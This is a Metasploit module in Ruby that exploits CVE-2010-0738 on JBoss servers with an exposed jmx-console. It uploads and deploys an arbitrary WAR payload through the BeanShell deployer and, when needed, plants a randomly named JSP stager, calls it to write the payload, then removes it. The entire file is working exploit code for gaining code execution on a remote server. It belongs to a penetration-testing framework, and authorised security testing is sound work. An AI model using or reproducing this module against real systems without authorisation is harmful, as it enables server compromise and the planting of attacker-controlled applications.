## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::JBoss def initialize super( 'Name' => 'JBoss JMX Console Beanshell Deployer WAR Upload and Deployment', 'Description' => %q{ This module can be used to install a WAR file payload on JBoss servers that have an exposed "jmx-console" application. The payload is put on the server by using the jboss.system:BSHDeployer's createScriptDeployment() method. }, 'Author' => [ 'us3r777 ' ], 'References' => [ [ 'CVE', '2010-0738' ], # using a VERB other than GET/POST [ 'OSVDB', '64171' ], [ 'URL', 'https://www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now' ], [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ] ], 'Actions' => [ ['Deploy', { 'Description' => 'Create and deploy app (WAR) to deliver payload' }], ['Undeploy', { 'Description' => 'Remove app (WAR) for cleanup' }] ], 'DefaultAction' => 'Deploy', 'License' => BSD_LICENSE, 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK], 'Reliability' => [] } ) register_options( [ Opt::RPORT(8080), OptString.new('APPBASE', [ true, 'Application base name', 'payload']), OptPath.new('WARFILE', [ false, 'The WAR file to deploy']) ] ) end def deploy_action(app_base, war_data) encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '') if http_verb == 'POST' print_status('Deploying payload...') opts = { file: "#{app_base}.war", contents: encoded_payload } else print_status('Deploying stager...') stager_name = Rex::Text.rand_text_alpha(rand(8..15)) stager_contents = stager_jsp(app_base) opts = { dir: "#{stager_name}.war", file: "#{stager_name}.war/#{stager_name}.jsp", contents: Rex::Text.encode_base64(stager_contents).gsub(/\n/, '') } end bsh_payload = generate_bsh(:create, opts) package = deploy_bsh(bsh_payload) if package.nil? print_error('Deployment failed') return end print_good('Deployment successful') return if http_verb == 'POST' # call the stager to deploy our real payload war stager_uri = '/' + stager_name + '/' + stager_name + '.jsp' payload_data = "#{Rex::Text.rand_text_alpha(rand(8..15))}=#{Rex::Text.uri_encode(encoded_payload)}" print_status("Calling stager #{stager_uri} to deploy final payload...") res = deploy( 'method' => 'POST', 'data' => payload_data, 'uri' => stager_uri ) if res && res.code == 200 print_good('Payload deployed') else print_error('Failed to deploy final payload') end # Remove the stager print_status('Removing stager...') files = {} files[:stager_jsp_name] = "#{stager_name}.war/#{stager_name}.jsp" files[:stager_base] = "#{stager_name}.war" delete_script = generate_bsh(:delete, files) res = deploy_package(delete_script, package) if res.nil? print_error('Unable to remove Stager') else print_good('Stager successfully removed') end end def undeploy_action(app_base) # Undeploy the WAR and the stager if needed print_status("Undeploying #{app_base} by deleting the WAR file via BSHDeployer...") files = {} files[:app_base] = "#{app_base}.war" delete_script = generate_bsh(:delete, files) package = deploy_bsh(delete_script) if package.nil? print_error('Unable to remove WAR') else print_good('Successfully removed') end end def run app_base = datastore['APPBASE'] case action.name when 'Deploy' unless datastore['WARFILE'] && File.exist?(datastore['WARFILE']) print_error('WAR file not found') return end war_data = File.read(datastore['WARFILE'], mode: 'rb') deploy_action(app_base, war_data) when 'Undeploy' undeploy_action(app_base) end end end